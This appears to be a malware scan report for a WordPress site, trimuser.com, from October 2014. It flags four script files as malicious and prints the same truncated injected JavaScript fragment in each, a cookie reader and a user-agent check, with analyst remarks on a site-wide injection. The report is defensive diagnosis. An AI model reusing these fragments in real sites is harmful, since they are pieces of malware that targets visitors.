Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trimuser.com
Result: Google marks this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://trimuser.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 17:52:37 GMT Location: http://www.trimuser.com/ Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: kpg_stop_spammers_time=1412877158; expires=Thu, 09-Oct-2014 17:53:38 GMT X-Pingback: http://www.trimuser.com/xmlrpc.php | clean |
http://www.trimuser.com/ | 200 OK Content-Length: 105038 Content-Type: text/html | clean |
http://www.trimuser.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96894 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8287 Content-Type: application/javascript | malicious |
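Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged code, cut off after "var o":
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
The visible part defines a cookie-reading helper and a function that tests navigator.userAgent against a fixed list of browser, operating-system and crawler strings; what the script does with the result is not shown. The same opening fragment appears in all four files flagged on this page, which points to a site-wide injection rather than a problem in one plugin. Because wp-includes/js/jquery/jquery-migrate.min.js is a stock WordPress file, comparing it with the copy from the official release shows exactly what was added.
Antivirus reports: (no entries are listed in this copy)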
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 20702 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 6677 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 9191 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/wp-whos-online/wp-whos-online.js?ver=1 | 200 OK Content-Length: 5625 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged code, cut off after "var o":
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
The excerpt then resumes with the end of the file, which looks like the plugin's own code:
} } $o.addClass( oclass ).removeClass( remove ); }); } function toggleUpdates() { if (0 == wpwhosonline.getwpwhosonlineUpdate) { wpwhosonline.getwpwhosonlineUpdate = setInterval(getwpwhosonline, 30000); } else { clearInterval(wpwhosonline.getwpwhosonlineUpdate); wpwhosonline.getwpwhosonlineUpdate = '0'; } } toggleUpdates(); updateRecents(); });
Antivirus reports: (no entries are listed in this copy)
http://www.trimuser.com/wp-content/themes/graphene/js/jquery.tools.min.js?ver=4.0 | 200 OK Content-Length: 12119 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/themes/graphene/js/graphene.js?ver=4.0 | 200 OK Content-Length: 9533 Content-Type: application/javascript | clean |
http://www.trimuser.com/mobiquo/smartbanner/appbanner.js | 200 OK Content-Length: 13451 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged code, cut off after "var o":
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
The excerpt then resumes with the end of the file, which looks like ordinary script code unrelated to the fragment above:
} } else { val = computedStyle[ measure ]; if ( val < 0 || val === null ) { val = elem.style[ measure ] || 0; } val = parseFloat( val ) || 0; if ( isOuter ) { val += paddingA + paddingB + marginA + marginB + borderA + borderB; } } return val; }
Antivirus reports: (no entries are listed in this copy)
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.trimuser.com/wp-content/plugins/jetpack/modules/photon/photon.js?ver=20130122 | 200 OK Content-Length: 2465 Content-Type: application/javascript | clean |
http://www.trimuser.com/wp-content/plugins/bbpress/templates/default/js/editor.js?ver=2.5.4-5380 | 200 OK Content-Length: 2486 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt of the flagged code, cut off after "var o":
function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o
The excerpt then resumes with the end of the file, which looks like the bbPress editor's own code:
if ( typeof( tinymce ) !== 'undefined' ) { if ( ! tinymce.activeEditor.isHidden() ) { var editor = tinymce.activeEditor.editorContainer; jQuery( '#' + editor + ' td.mceToolbar > a' ).focus(); } else { jQuery( 'textarea.bbp-the-content' ).focus(); } } else { jQuery( 'textarea.bbp-the-content' ).focus(); } e.preventDefault(); } }); });
Antivirus reports: (no entries are listed in this copy)
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201441 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Octaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trimuser.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 17:52:37 GMT
Location: http://www.trimuser.com/
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: kpg_stop_spammers_time=1412877158; expires=Thu, 09-Oct-2014 17:53:38 GMT
X-Pingback: http://www.trimuser.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trimuser.com
Referer: http://www.google.com/search?q=trimuser.com
Result:
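The result is similar to the first query; no suspicious redirects were found. As shown, this check looks only at the server's HTTP response to a request carrying a search-engine Referer. The scripts flagged as malicious above run in the visitor's browser and inspect the user agent, so a clean result here does not clear those files.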